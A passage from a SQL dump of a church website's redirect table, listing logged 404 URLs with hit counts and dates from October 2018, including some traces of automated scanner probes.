(9652, 'https://www.lifeoasisinternationalchurch.org/component/users/?view=634&itemid=101', NULL, '', '', 1, 0, '2018-10-13 14:07:33', '0000-00-00 00:00:00', 301),
(9653, 'https://lifeoasisinternationalchurch.org/2-features/13-widgetkit?showall=&start=316', NULL, '', '', 1, 0, '2018-10-13 14:09:43', '0000-00-00 00:00:00', 301),
(9654, 'https://www.lifeoasisinternationalchurch.org/index.php?option=com_k2&view=742&task=calendar&month=4&year=2018&itemid=622', NULL, '', '', 1, 0, '2018-10-13 14:32:31', '0000-00-00 00:00:00', 301),
(9655, 'https://www.lifeoasisinternationalchurch.org/watch?ajax=1&layout=mobile&sts=17151&tsp=1&utcoffset=540&v=xbnbx7et8wc', NULL, 'https://www.lifeoasisinternationalchurch.org/youtube', '', 1, 0, '2018-10-14 21:14:59', '0000-00-00 00:00:00', 301),
(9656, 'https://www.lifeoasisinternationalchurch.org/index.php?option=com_k2&view=740&task=calendar&month=2&year=2018&itemid=622', NULL, '', '', 1, 0, '2018-10-14 22:45:03', '0000-00-00 00:00:00', 301),
(9657, 'https://www.lifeoasisinternationalchurch.org/adipisicing-elite?id=744', NULL, '', '', 1, 0, '2018-10-14 22:45:37', '0000-00-00 00:00:00', 301),
(9658, 'https://www.lifeoasisinternationalchurch.org/2-features/13-widgetkit?showall=&start=450', NULL, '', '', 1, 0, '2018-10-14 22:45:38', '0000-00-00 00:00:00', 301),
(9659, 'https://www.lifeoasisinternationalchurch.org/resources/live-streaming?id=676', NULL, '', '', 1, 0, '2018-10-14 22:49:11', '0000-00-00 00:00:00', 301),
(9660, 'https://www.lifeoasisinternationalchurch.org/index.php?option=com_k2&view=238&task=calendar&month=5&year=2018&itemid=622', NULL, '', '', 1, 0, '2018-10-14 22:54:16', '0000-00-00 00:00:00', 301),
(9661, 'https://www.lifeoasisinternationalchurch.org/index.php?option=com_k2&view=922&task=calendar&month=6&year=2018&itemid=622', NULL, '', '', 1, 0, '2018-10-14 22:54:33', '0000-00-00 00:00:00', 301),
(9662, 'https://lifeoasisinternationalchurch.org/component/users/?view=154&itemid=101', NULL, '', '', 1, 0, '2018-10-14 22:58:05', '0000-00-00 00:00:00', 301),
(9663, 'https://www.lifeoasisinternationalchurch.org/2-features/13-widgetkit?showall=&start=658', NULL, '', '', 1, 0, '2018-10-14 22:58:28', '0000-00-00 00:00:00', 301),
(9664, 'https://www.lifeoasisinternationalchurch.org/index.php?option=com_k2&view=978&task=calendar&month=3&year=2017&itemid=622', NULL, '', '', 1, 0, '2018-10-14 22:59:43', '0000-00-00 00:00:00', 301),
(9665, 'https://www.lifeoasisinternationalchurch.org/index.php?option=com_k2&view=798&task=calendar&month=4&year=2018&itemid=622', NULL, '', '', 1, 0, '2018-10-14 22:59:43', '0000-00-00 00:00:00', 301),
(9666, 'https://www.lifeoasisinternationalchurch.org/index.php?option=com_k2&view=704&task=calendar&month=9&year=2017&itemid=622', NULL, '', '', 1, 0, '2018-10-14 23:05:59', '0000-00-00 00:00:00', 301),
(9667, 'https://www.lifeoasisinternationalchurch.org/.php', NULL, '', '', 1, 0, '2018-10-14 23:17:28', '0000-00-00 00:00:00', 301),
(9668, 'https://www.lifeoasisinternationalchurch.org/component/users/?view=212&itemid=101', NULL, '', '', 1, 0, '2018-10-14 23:18:26', '0000-00-00 00:00:00', 301),
(9669, 'https://lifeoasisinternationalchurch.org/2-features/13-widgetkit?showall=&start=486', NULL, '', '', 1, 0, '2018-10-14 23:20:05', '0000-00-00 00:00:00', 301),
(9670, 'https://www.lifeoasisinternationalchurch.org/component/users/?view=730', NULL, '', '', 1, 0, '2018-10-14 23:22:10', '0000-00-00 00:00:00', 301),
(9671, 'https://lifeoasisinternationalchurch.org/component/users/?view=928&itemid=101', NULL, '', '', 1, 0, '2018-10-14 23:22:29', '0000-00-00 00:00:00', 301),
(9672, 'https://www.lifeoasisinternationalchurch.org/upload.php', NULL, '', '', 1, 0, '2018-10-14 23:40:58', '0000-00-00 00:00:00', 301),
(9673, 'https://www.lifeoasisinternationalchurch.org/0.php', NULL, '', '', 1, 0, '2018-10-14 23:48:46', '0000-00-00 00:00:00', 301),
(9674, 'https://www.lifeoasisinternationalchurch.org/2.php', NULL, '', '', 1, 0, '2018-10-15 00:03:59', '0000-00-00 00:00:00', 301),
(9675, 'https://www.lifeoasisinternationalchurch.org/3.php', NULL, '', '', 1, 0, '2018-10-15 00:11:39', '0000-00-00 00:00:00', 301),
(9676, 'https://www.lifeoasisinternationalchurch.org/6.php', NULL, '', '', 1, 0, '2018-10-15 00:34:27', '0000-00-00 00:00:00', 301),
(9677, 'https://www.lifeoasisinternationalchurch.org/7.php', NULL, '', '', 1, 0, '2018-10-15 00:41:55', '0000-00-00 00:00:00', 301),
(9678, 'https://www.lifeoasisinternationalchurch.org/8.php', NULL, '', '', 1, 0, '2018-10-15 00:49:24', '0000-00-00 00:00:00', 301),
(9679, 'https://www.lifeoasisinternationalchurch.org/z.php', NULL, '', '', 1, 0, '2018-10-15 01:04:36', '0000-00-00 00:00:00', 301),
(9680, 'https://www.lifeoasisinternationalchurch.org/y.php', NULL, '', '', 1, 0, '2018-10-15 01:12:09', '0000-00-00 00:00:00', 301),
(9681, 'https://www.lifeoasisinternationalchurch.org/x.php', NULL, '', '', 1, 0, '2018-10-15 01:19:41', '0000-00-00 00:00:00', 301),
(9682, 'https://www.lifeoasisinternationalchurch.org/v.php', NULL, '', '', 1, 0, '2018-10-15 01:34:51', '0000-00-00 00:00:00', 301),
(9683, 'https://www.lifeoasisinternationalchurch.org/o.php', NULL, '', '', 1, 0, '2018-10-15 02:27:44', '0000-00-00 00:00:00', 301),
(9684, 'https://www.lifeoasisinternationalchurch.org/css_.php', NULL, '', '', 7, 0, '2018-10-15 09:55:33', '0000-00-00 00:00:00', 301),
(9685, 'https://www.lifeoasisinternationalchurch.org/index.php?option=com_k2&view=328&task=calendar&month=6&year=2017&itemid=622', NULL, '', '', 1, 0, '2018-10-15 14:29:37', '0000-00-00 00:00:00', 301),
(9686, 'https://lifeoasisinternationalchurch.org/component/users/?view=674&itemid=101', NULL, '', '', 1, 0, '2018-10-15 14:30:49', '0000-00-00 00:00:00', 301),
(9687, 'https://www.lifeoasisinternationalchurch.org/index.php?option=com_k2&view=348&task=calendar&month=6&year=2018&itemid=622', NULL, '', '', 1, 0, '2018-10-15 14:39:46', '0000-00-00 00:00:00', 301),
(9688, 'https://www.lifeoasisinternationalchurch.org/index.php?option=com_k2&view=52&task=calendar&month=9&year=2017&itemid=622', NULL, '', '', 1, 0, '2018-10-15 14:39:47', '0000-00-00 00:00:00', 301),
(9689, 'https://lifeoasisinternationalchurch.org/2-features/13-widgetkit?showall=&start=192', NULL, '', '', 1, 0, '2018-10-15 14:57:26', '0000-00-00 00:00:00', 301),
(9690, 'https://www.lifeoasisinternationalchurch.org/adipisicing-elite?id=436', NULL, '', '', 1, 0, '2018-10-15 15:00:23', '0000-00-00 00:00:00', 301),
(9691, 'https://www.lifeoasisinternationalchurch.org/index.php?option=com_k2&view=6&task=calendar&month=5&year=2017&itemid=622', NULL, '', '', 1, 0, '2018-10-15 15:02:40', '0000-00-00 00:00:00', 301),
(9692, 'https://www.lifeoasisinternationalchurch.org/component/users/?view=126', NULL, '', '', 1, 0, '2018-10-15 15:02:40', '0000-00-00 00:00:00', 301),
(9693, 'https://lifeoasisinternationalchurch.org/ate', NULL, '', '', 1, 0, '2018-10-15 16:00:43', '0000-00-00 00:00:00', 301),
(9694, 'https://lifeoasisinternationalchurch.org/css_.php', NULL, '', '', 7, 0, '2018-10-16 00:05:38', '0000-00-00 00:00:00', 301),
(9695, 'https://www.lifeoasisinternationalchurch.org/component/users/?view=786&itemid=101', NULL, '', '', 1, 0, '2018-10-16 14:58:21', '0000-00-00 00:00:00', 301),
(9696, 'https://www.lifeoasisinternationalchurch.org/index.php?option=com_k2&view=806&task=calendar&month=4&year=2018&itemid=622', NULL, '', '', 1, 0, '2018-10-16 15:16:21', '0000-00-00 00:00:00', 301),
(9697, 'https://lifeoasisinternationalchurch.org/component/users/?view=872&itemid=101', NULL, '', '', 1, 0, '2018-10-16 15:19:32', '0000-00-00 00:00:00', 301),
(9698, 'https://www.lifeoasisinternationalchurch.org/index.php?option=com_k2&view=16&task=calendar&month=3&year=2017&itemid=622', NULL, '', '', 1, 0, '2018-10-16 15:20:26', '0000-00-00 00:00:00', 301),
(9699, 'https://www.lifeoasisinternationalchurch.org/2-features/13-widgetkit?showall=&start=640', NULL, '', '', 1, 0, '2018-10-16 20:47:59', '0000-00-00 00:00:00', 301),
(9700, 'https://www.lifeoasisinternationalchurch.org/component/users/?view=860', NULL, '', '', 1, 0, '2018-10-16 20:50:47', '0000-00-00 00:00:00', 301),
(9701, 'https://www.lifeoasisinternationalchurch.org/index.php?option=com_k2&view=164&task=calendar&month=5&year=2018&itemid=622', NULL, '', '', 1, 0, '2018-10-17 00:36:47', '0000-00-00 00:00:00', 301),
(9702, 'https://142.4.21.132/nmaplowercheck1539738811', NULL, '', '', 1, 0, '2018-10-17 01:13:32', '0000-00-00 00:00:00', 301),
(9703, 'https://www.lifeoasisinternationalchurch.org/index.php?option=com_k2&view=650&task=calendar&month=6&year=2018&itemid=622', NULL, '', '', 1, 0, '2018-10-17 13:49:00', '0000-00-00 00:00:00', 301),
(9704, 'https://www.lifeoasisinternationalchurch.org/index.php?option=com_k2&view=310&task=calendar&month=4&year=2018&itemid=622', NULL, '', '', 1, 0, '2018-10-17 13:51:31', '0000-00-00 00:00:00', 301),
(9705, 'https://www.lifeoasisinternationalchurch.org/component/users/?view=630&itemid=101', NULL, '', '', 1, 0, '2018-10-17 13:59:32', '0000-00-00 00:00:00', 301),
(9706, 'https://www.lifeoasisinternationalchurch.org/component/users/?view=638', NULL, '', '', 1, 0, '2018-10-17 13:59:35', '0000-00-00 00:00:00', 301),
(9707, 'https://lifeoasisinternationalchurch.org/component/users/?view=852&itemid=101', NULL, '', '', 1, 0, '2018-10-17 14:25:30', '0000-00-00 00:00:00', 301),
(9708, 'https://www.lifeoasisinternationalchurch.org/index.php?option=com_k2&view=462&task=calendar&month=5&year=2018&itemid=622', NULL, '', '', 2, 0, '2018-10-17 14:34:42', '0000-00-00 00:00:00', 301),
(9709, 'https://www.lifeoasisinternationalchurch.org/component/users/?view=720', NULL, '', '', 1, 0, '2018-10-17 15:06:36', '0000-00-00 00:00:00', 301),
(9710, 'https://mail.lifeoasisinternationalchurch.org/wp-login.php', NULL, '', '', 8, 0, '2018-10-17 15:42:49', '0000-00-00 00:00:00', 301),
(9711, 'https://mail.lifeoasisinternationalchurch.org/blog/wp-login.php', NULL, '', '', 1, 0, '2018-10-17 15:42:51', '0000-00-00 00:00:00', 301),
(9712, 'https://mail.lifeoasisinternationalchurch.org/wp/wp-login.php', NULL, '', '', 1, 0, '2018-10-17 15:42:54', '0000-00-00 00:00:00', 301),
(9713, 'https://www.lifeoasisinternationalchurch.org/watch?ajax=1&layout=mobile&sts=17151&tsp=1&utcoffset=540&v=n-eqveho2bo', NULL, 'https://www.lifeoasisinternationalchurch.org/youtube', '', 1, 0, '2018-10-17 17:11:21', '0000-00-00 00:00:00', 301),
(9714, 'https://www.lifeoasisinternationalchurch.org/resource', NULL, '', '', 1, 0, '2018-10-17 17:12:10', '0000-00-00 00:00:00', 301),
(9715, 'https://lifeoasisinternationalchurch.org/streming', NULL, '', '', 4, 0, '2018-10-17 17:16:41', '0000-00-00 00:00:00', 301),
(9716, 'https://www.lifeoasisinternationalchurch.org/watch?ajax=1&layout=mobile&sts=17151&tsp=1&utcoffset=540&v=vxb8uxjezk8', NULL, 'https://www.lifeoasisinternationalchurch.org/youtube', '', 1, 0, '2018-10-17 17:57:15', '0000-00-00 00:00:00', 301),
(9717, 'https://www.lifeoasisinternationalchurch.org/component/k2/it', NULL, '', '', 1, 0, '2018-10-17 21:48:53', '0000-00-00 00:00:00', 301),
(9718, 'https://www.lifeoasisinternationalchurch.org/resources/live-streaming?id=918', NULL, '', '', 1, 0, '2018-10-18 14:32:26', '0000-00-00 00:00:00', 301),
(9719, 'https://lifeoasisinternationalchurch.org/2-features/13-widgetkit?showall=&start=50', NULL, '', '', 1, 0, '2018-10-18 14:32:43', '0000-00-00 00:00:00', 301),
(9720, 'https://www.lifeoasisinternationalchurch.org/2-features/13-widgetkit?showall=&start=754', NULL, '', '', 1, 0, '2018-10-18 14:39:19', '0000-00-00 00:00:00', 301),
(9721, 'https://www.lifeoasisinternationalchurch.org/index.php?option=com_k2&view=808&task=calendar&month=6&year=2018&itemid=622', NULL, '', '', 1, 0, '2018-10-18 14:53:34', '0000-00-00 00:00:00', 301),
(9722, 'https://www.lifeoasisinternationalchurch.org/index.php?option=com_k2&view=380&task=calendar&month=6&year=2017&itemid=622', NULL, '', '', 1, 0, '2018-10-18 14:53:55', '0000-00-00 00:00:00', 301),
(9723, 'https://www.lifeoasisinternationalchurch.org/index.php?option=com_k2&view=150&task=calendar&month=5&year=2017&itemid=622', NULL, '', '', 1, 0, '2018-10-18 14:53:57', '0000-00-00 00:00:00', 301),
(9724, 'https://www.lifeoasisinternationalchurch.org/index.php?option=com_k2&view=96&task=calendar&month=3&year=2017&itemid=622', NULL, '', '', 1, 0, '2018-10-18 14:59:23', '0000-00-00 00:00:00', 301),
(9725, 'https://www.lifeoasisinternationalchurch.org/streamingdc radio', NULL, '', '', 1, 0, '2018-10-18 17:15:02', '0000-00-00 00:00:00', 301),
(9726, 'https://lifeoasisinternationalchurch.org//livestreaming', NULL, '', '', 1, 0, '2018-10-18 17:25:15', '0000-00-00 00:00:00', 301),
(9727, 'https://lifeoasisinternationalchurch.org/status', NULL, '', '', 2, 0, '2018-10-18 19:28:45', '0000-00-00 00:00:00', 301),
(9728, 'https://lifeoasisinternationalchurch.org/prayer-request', NULL, '', '', 4, 0, '2018-10-18 20:52:37', '0000-00-00 00:00:00', 301),
(9729, 'https://www.lifeoasisinternationalchurch.org/component/content/article/11-demo-articles/5-menu-options', NULL, '', '', 1, 0, '2018-10-19 13:20:59', '0000-00-00 00:00:00', 301),
(9730, 'https://www.lifeoasisinternationalchurch.org/component/users/?view=754', NULL, '', '', 1, 0, '2018-10-19 14:28:10', '0000-00-00 00:00:00', 301),
(9731, 'https://www.lifeoasisinternationalchurch.org/index.php?option=com_k2&view=374&task=calendar&month=6&year=2018&itemid=622', NULL, '', '', 1, 0, '2018-10-19 14:33:37', '0000-00-00 00:00:00', 301),
(9732, 'https://lifeoasisinternationalchurch.org/component/users/?view=868&itemid=101', NULL, '', '', 1, 0, '2018-10-19 14:45:42', '0000-00-00 00:00:00', 301),
(9733, 'https://www.lifeoasisinternationalchurch.org/index.php?option=com_k2&view=680&task=calendar&month=2&year=2018&itemid=622', NULL, '', '', 1, 0, '2018-10-19 14:45:48', '0000-00-00 00:00:00', 301),
(9734, 'https://www.lifeoasisinternationalchurch.org/component/users/?view=194&itemid=101', NULL, '', '', 1, 0, '2018-10-19 14:48:55', '0000-00-00 00:00:00', 301),
(9735, 'https://www.lifeoasisinternationalchurch.org/index.php?option=com_k2&view=468&task=calendar&month=3&year=2017&itemid=622', NULL, '', '', 1, 0, '2018-10-19 14:52:17', '0000-00-00 00:00:00', 301),
(9736, 'https://www.lifeoasisinternationalchurch.org/component/users/?view=520', NULL, '', '', 1, 0, '2018-10-19 14:54:08', '0000-00-00 00:00:00', 301),
(9737, 'https://www.lifeoasisinternationalchurch.org/index.php?option=com_k2&view=76&task=calendar&month=5&year=2018&itemid=622', NULL, '', '', 1, 0, '2018-10-19 14:58:36', '0000-00-00 00:00:00', 301),
(9738, 'https://www.lifeoasisinternationalchurch.org/adipisicing-elite?id=900', NULL, '', '', 1, 0, '2018-10-19 15:06:16', '0000-00-00 00:00:00', 301),
(9739, 'https://mail.lifeoasisinternationalchurch.org/resources/vod', NULL, '', '', 5, 0, '2018-10-20 03:30:30', '0000-00-00 00:00:00', 301),
(9740, 'https://www.lifeoasisinternationalchurch.org/index.php?option=com_k2&view=822&task=calendar&month=2&year=2018&itemid=622', NULL, '', '', 1, 0, '2018-10-20 13:32:14', '0000-00-00 00:00:00', 301),
(9741, 'https://www.lifeoasisinternationalchurch.org/component/users/?view=248&itemid=101', NULL, '', '', 1, 0, '2018-10-20 13:32:16', '0000-00-00 00:00:00', 301),
(9742, 'https://lifeoasisinternationalchurch.org/2-features/13-widgetkit?showall=&start=228', NULL, '', '', 1, 0, '2018-10-20 13:49:36', '0000-00-00 00:00:00', 301),
(9743, 'https://www.lifeoasisinternationalchurch.org/index.php?option=com_k2&view=62&task=calendar&month=4&year=2018&itemid=622', NULL, '', '', 1, 0, '2018-10-20 13:49:38', '0000-00-00 00:00:00', 301),
(9744, 'https://lifeoasisinternationalchurch.org/component/users/?view=280&itemid=101', NULL, '', '', 1, 0, '2018-10-20 13:58:44', '0000-00-00 00:00:00', 301),
(9745, 'https://www.lifeoasisinternationalchurch.org/watch?ajax=1&layout=mobile&sts=17151&tsp=1&utcoffset=540&v=vepavk5jny0', NULL, 'https://www.lifeoasisinternationalchurch.org/youtube', '', 1, 0, '2018-10-20 15:56:26', '0000-00-00 00:00:00', 301),
(9746, 'https://www.lifeoasisinternationalchurch.org/watch?ajax=1&layout=mobile&sts=17151&tsp=1&utcoffset=540&v=ocrwui8pra0', NULL, 'https://www.lifeoasisinternationalchurch.org/youtube', '', 3, 0, '2018-10-21 10:46:48', '0000-00-00 00:00:00', 301),
(9747, 'https://www.lifeoasisinternationalchurch.org/sfor', NULL, '', '', 8, 0, '2018-10-21 14:02:44', '0000-00-00 00:00:00', 301),
(9748, 'https://www.lifeoasisinternationalchurch.org/for', NULL, '', '', 1, 0, '2018-10-21 14:02:44', '0000-00-00 00:00:00', 301),
(9749, 'https://lifeoasisinternationalchurch.org/component/users/?view=934&itemid=101', NULL, '', '', 1, 0, '2018-10-21 14:28:28', '0000-00-00 00:00:00', 301),
(9750, 'https://lifeoasisinternationalchurch.org/component/users/?view=640&itemid=101', NULL, '', '', 1, 0, '2018-10-21 14:28:48', '0000-00-00 00:00:00', 301),
(9751, 'https://lifeoasisinternationalchurch.org/2-features/13-widgetkit?showall=&start=100', NULL, '', '', 1, 0, '2018-10-21 14:32:29', '0000-00-00 00:00:00', 301),
(9752, 'https://www.lifeoasisinternationalchurch.org/resources/live-streaming?id=552', NULL, '', '', 1, 0, '2018-10-21 14:38:37', '0000-00-00 00:00:00', 301),
(9753, 'https://www.lifeoasisinternationalchurch.org/adipisicing-elite?id=548', NULL, '', '', 1, 0, '2018-10-21 14:42:41', '0000-00-00 00:00:00', 301),
(9754, 'https://www.lifeoasisinternationalchurch.org/component/users/?view=58', NULL, '', '', 1, 0, '2018-10-21 14:44:52', '0000-00-00 00:00:00', 301),
(9755, 'https://www.lifeoasisinternationalchurch.org/index.php?option=com_k2&view=190&task=calendar&month=9&year=2017&itemid=622', NULL, '', '', 1, 0, '2018-10-21 14:46:00', '0000-00-00 00:00:00', 301),
(9756, 'https://www.lifeoasisinternationalchurch.org/index.php?option=com_k2&view=772&task=calendar&month=4&year=2017&itemid=622', NULL, '', '', 1, 0, '2018-10-21 14:48:31', '0000-00-00 00:00:00', 301),
(9757, 'https://www.lifeoasisinternationalchurch.org/component/users/?view=362&itemid=101', NULL, '', '', 1, 0, '2018-10-21 14:50:17', '0000-00-00 00:00:00', 301),
(9758, 'https://www.lifeoasisinternationalchurch.org/component/users/?view=602', NULL, '', '', 1, 0, '2018-10-21 14:54:47', '0000-00-00 00:00:00', 301),
(9759, 'https://www.lifeoasisinternationalchurch.org/index.php?option=com_k2&view=404&task=calendar&month=2&year=2018&itemid=622', NULL, '', '', 1, 0, '2018-10-21 14:57:45', '0000-00-00 00:00:00', 301),
(9760, 'https://www.lifeoasisinternationalchurch.org/2-features/13-widgetkit?showall=&start=762', NULL, '', '', 1, 0, '2018-10-21 14:58:26', '0000-00-00 00:00:00', 301),
(9761, 'https://lifeoasisinternationalchurch.org/resourcesstreaming', NULL, '', '', 1, 0, '2018-10-22 08:27:46', '0000-00-00 00:00:00', 301),
(9762, 'https://lifeoasisinternationalchurch.org/resstreaming', NULL, '', '', 1, 0, '2018-10-22 08:27:48', '0000-00-00 00:00:00', 301),
(9763, 'https://www.lifeoasisinternationalchurch.org/index.php?option=com_k2&view=234&task=calendar&month=2&year=2018&itemid=622', NULL, '', '', 1, 0, '2018-10-22 13:32:19', '0000-00-00 00:00:00', 301),
(9764, 'https://www.lifeoasisinternationalchurch.org/component/users/?view=148', NULL, '', '', 1, 0, '2018-10-22 13:40:42', '0000-00-00 00:00:00', 301),
(9765, 'https://www.lifeoasisinternationalchurch.org/2-features/13-widgetkit?showall=&start=42', NULL, '', '', 1, 0, '2018-10-22 13:46:33', '0000-00-00 00:00:00', 301),
(9766, 'https://www.lifeoasisinternationalchurch.org/index.php?option=com_k2&view=534&task=calendar&month=6&year=2018&itemid=622', NULL, '', '', 1, 0, '2018-10-22 13:47:33', '0000-00-00 00:00:00', 301),
(9767, 'https://www.lifeoasisinternationalchurch.org/index.php?option=com_k2&view=490&task=calendar&month=3&year=2017&itemid=622', NULL, '', '', 1, 0, '2018-10-22 13:47:50', '0000-00-00 00:00:00', 301),
(9768, 'https://www.lifeoasisinternationalchurch.org/2-features/13-widgetkit?showall=&start=502', NULL, '', '', 1, 0, '2018-10-22 13:48:31', '0000-00-00 00:00:00', 301),
(9769, 'https://www.lifeoasisinternationalchurch.org/component/users/?view=320&itemid=101', NULL, '', '', 1, 0, '2018-10-22 13:49:53', '0000-00-00 00:00:00', 301),
(9770, 'https://www.lifeoasisinternationalchurch.org/component/users/?view=358&itemid=101', NULL, '', '', 1, 0, '2018-10-22 13:56:41', '0000-00-00 00:00:00', 301),
(9771, 'https://lifeoasisinternationalchurch.org/component/users/?view=646&itemid=101', NULL, '', '', 1, 0, '2018-10-22 15:17:05', '0000-00-00 00:00:00', 301),
(9772, 'https://lifeoasisinternationalchurch.org/2-features/13-widgetkit?showall=&start=448', NULL, '', '', 1, 0, '2018-10-22 16:04:18', '0000-00-00 00:00:00', 301),
(9773, 'https://lifeoasisinternationalchurch.org/component/users/?view=366&itemid=101', NULL, '', '', 1, 0, '2018-10-22 16:11:07', '0000-00-00 00:00:00', 301),
(9774, 'https://www.lifeoasisinternationalchurch.org/watch?ajax=1&layout=mobile&sts=17151&tsp=1&utcoffset=540&v=1d_ep-7i3vo', NULL, 'https://www.lifeoasisinternationalchurch.org/youtube', '', 1, 0, '2018-10-22 21:31:56', '0000-00-00 00:00:00', 301),
(9775, 'https://www.lifeoasisinternationalchurch.org/index.php?option=com_k2&view=670&task=calendar&month=6&year=2018&itemid=622', NULL, '', '', 1, 0, '2018-10-23 14:26:47', '0000-00-00 00:00:00', 301),
(9776, 'https://www.lifeoasisinternationalchurch.org/component/users/?view=694', NULL, '', '', 1, 0, '2018-10-23 14:26:52', '0000-00-00 00:00:00', 301),
(9777, 'https://www.lifeoasisinternationalchurch.org/index.php?option=com_k2&view=44&task=calendar&month=4&year=2018&itemid=622', NULL, '', '', 1, 0, '2018-10-23 14:27:00', '0000-00-00 00:00:00', 301),
(9778, 'https://www.lifeoasisinternationalchurch.org/index.php?option=com_k2&view=890&task=calendar&month=5&year=2017&itemid=622', NULL, '', '', 1, 0, '2018-10-23 14:30:40', '0000-00-00 00:00:00', 301),
(9779, 'https://www.lifeoasisinternationalchurch.org/2-features/13-widgetkit?showall=&start=18', NULL, '', '', 1, 0, '2018-10-23 14:36:38', '0000-00-00 00:00:00', 301),
(9780, 'https://www.lifeoasisinternationalchurch.org/index.php?option=com_k2&view=254&task=calendar&month=6&year=2017&itemid=622', NULL, '', '', 1, 0, '2018-10-23 14:46:18', '0000-00-00 00:00:00', 301),
(9781, 'https://lifeoasisinternationalchurch.org/component/users/?view=636&itemid=101', NULL, '', '', 1, 0, '2018-10-23 14:59:23', '0000-00-00 00:00:00', 301),
(9782, 'https://lifeoasisinternationalchurch.org/component/users/?view=322&itemid=101', NULL, '', '', 1, 0, '2018-10-23 15:00:02', '0000-00-00 00:00:00', 301),
(9783, 'https://www.lifeoasisinternationalchurch.org/adipisicing-elite?id=590', NULL, '', '', 1, 0, '2018-10-24 14:07:25', '0000-00-00 00:00:00', 301),
(9784, 'https://www.lifeoasisinternationalchurch.org/index.php?option=com_k2&view=824&task=calendar&month=5&year=2018&itemid=622', NULL, '', '', 1, 0, '2018-10-24 14:09:49', '0000-00-00 00:00:00', 301),
(9785, 'https://lifeoasisinternationalchurch.org/component/users/?view=860&itemid=101', NULL, '', '', 1, 0, '2018-10-24 14:11:05', '0000-00-00 00:00:00', 301),
(9786, 'https://www.lifeoasisinternationalchurch.org/index.php?option=com_k2&view=554&task=calendar&month=4&year=2018&itemid=622', NULL, '', '', 1, 0, '2018-10-24 14:12:35', '0000-00-00 00:00:00', 301),
(9787, 'https://www.lifeoasisinternationalchurch.org/index.php?option=com_k2&view=522&task=calendar&month=6&year=2017&itemid=622', NULL, '', '', 1, 0, '2018-10-24 14:15:57', '0000-00-00 00:00:00', 301),
(9788, 'https://lifeoasisinternationalchurch.org/2-features/13-widgetkit?showall=&start=324', NULL, '', '', 1, 0, '2018-10-24 14:20:30', '0000-00-00 00:00:00', 301),
(9789, 'https://lifeoasisinternationalchurch.org/component/users/?view=652&itemid=101', NULL, '', '', 1, 0, '2018-10-24 14:21:29', '0000-00-00 00:00:00', 301),
(9790, 'https://www.lifeoasisinternationalchurch.org/index.php?option=com_k2&view=568&task=calendar&month=6&year=2018&itemid=622', NULL, '', '', 1, 0, '2018-10-24 14:22:13', '0000-00-00 00:00:00', 301),
(9791, 'https://www.lifeoasisinternationalchurch.org/component/users/?view=162&itemid=101', NULL, '', '', 1, 0, '2018-10-24 14:25:16', '0000-00-00 00:00:00', 301),
(9792, 'https://www.lifeoasisinternationalchurch.org/index.php?option=com_k2&view=78&task=calendar&month=4&year=2017&itemid=622', NULL, '', '', 1, 0, '2018-10-24 14:25:16', '0000-00-00 00:00:00', 301),
(9793, 'https://www.lifeoasisinternationalchurch.org/index.php?option=com_k2&view=780&task=calendar&month=9&year=2017&itemid=622', NULL, '', '', 1, 0, '2018-10-24 14:28:58', '0000-00-00 00:00:00', 301),
(9794, 'https://www.lifeoasisinternationalchurch.org/index.php?option=com_k2&view=184&task=calendar&month=3&year=2017&itemid=622', NULL, '', '', 1, 0, '2018-10-24 14:32:14', '0000-00-00 00:00:00', 301),
(9795, 'https://www.lifeoasisinternationalchurch.org/2-features/13-widgetkit?showall=&start=130', NULL, '', '', 1, 0, '2018-10-24 14:33:14', '0000-00-00 00:00:00', 301),
(9796, 'https://www.lifeoasisinternationalchurch.org/index.php?option=com_k2&view=390&task=calendar&month=2&year=2018&itemid=622', NULL, '', '', 1, 0, '2018-10-24 14:37:37', '0000-00-00 00:00:00', 301),
(9797, 'https://www.lifeoasisinternationalchurch.org/index.php?option=com_k2&view=656&task=calendar&month=5&year=2017&itemid=622', NULL, '', '', 1, 0, '2018-10-24 14:46:16', '0000-00-00 00:00:00', 301),
(9798, 'https://www.lifeoasisinternationalchurch.org/component/users/?view=926', NULL, '', '', 1, 0, '2018-10-24 14:49:04', '0000-00-00 00:00:00', 301),
(9799, 'https://lifeoasisinternationalchurch.org/sarg/', NULL, 'http://lifeoasisinternationalchurch.org/sarg/', '', 1, 0, '2018-10-24 16:08:10', '0000-00-00 00:00:00', 301),
(9800, 'https://www.lifeoasisinternationalchurch.org/sarg/', NULL, 'http://www.lifeoasisinternationalchurch.org/sarg/', '', 1, 0, '2018-10-24 19:08:33', '0000-00-00 00:00:00', 301),
(9801, 'https://www.lifeoasisinternationalchurch.org/watch?ajax=1&layout=mobile&sts=17151&tsp=1&utcoffset=540&v=npa-6sbqfkw', NULL, 'https://www.lifeoasisinternationalchurch.org/youtube', '', 1, 0, '2018-10-24 23:45:12', '0000-00-00 00:00:00', 301),
(9802, 'https://www.lifeoasisinternationalchurch.org/component/users/?view=706', NULL, '', '', 1, 0, '2018-10-25 14:38:06', '0000-00-00 00:00:00', 301),
(9803, 'https://www.lifeoasisinternationalchurch.org/component/users/?view=270&itemid=101', NULL, '', '', 1, 0, '2018-10-25 14:46:06', '0000-00-00 00:00:00', 301),
(9804, 'https://www.lifeoasisinternationalchurch.org/index.php?option=com_k2&view=38&task=calendar&month=9&year=2017&itemid=622', NULL, '', '', 1, 0, '2018-10-25 14:46:07', '0000-00-00 00:00:00', 301),
(9805, 'https://www.lifeoasisinternationalchurch.org/index.php?option=com_k2&view=866&task=calendar&month=6&year=2017&itemid=622', NULL, '', '', 1, 0, '2018-10-25 14:49:11', '0000-00-00 00:00:00', 301),
(9806, 'https://www.lifeoasisinternationalchurch.org/index.php?option=com_k2&view=848&task=calendar&month=5&year=2018&itemid=622', NULL, '', '', 1, 0, '2018-10-25 14:49:51', '0000-00-00 00:00:00', 301),
(9807, 'https://lifeoasisinternationalchurch.org/2-features/13-widgetkit?showall=&start=682', NULL, '', '', 1, 0, '2018-10-25 14:51:36', '0000-00-00 00:00:00', 301),
(9808, 'https://www.lifeoasisinternationalchurch.org/2-features/13-widgetkit?showall=&start=8', NULL, '', '', 1, 0, '2018-10-25 14:51:47', '0000-00-00 00:00:00', 301),
(9809, 'https://lifeoasisinternationalchurch.org/component/users/?view=112&itemid=101', NULL, '', '', 1, 0, '2018-10-25 14:55:05', '0000-00-00 00:00:00', 301),
(9810, 'https://www.lifeoasisinternationalchurch.org/2-features/13-widgetkit?showall=&start=590', NULL, '', '', 1, 0, '2018-10-25 14:55:51', '0000-00-00 00:00:00', 301),
(9811, 'https://www.lifeoasisinternationalchurch.org/component/users/?view=28', NULL, '', '', 1, 0, '2018-10-25 14:58:29', '0000-00-00 00:00:00', 301),
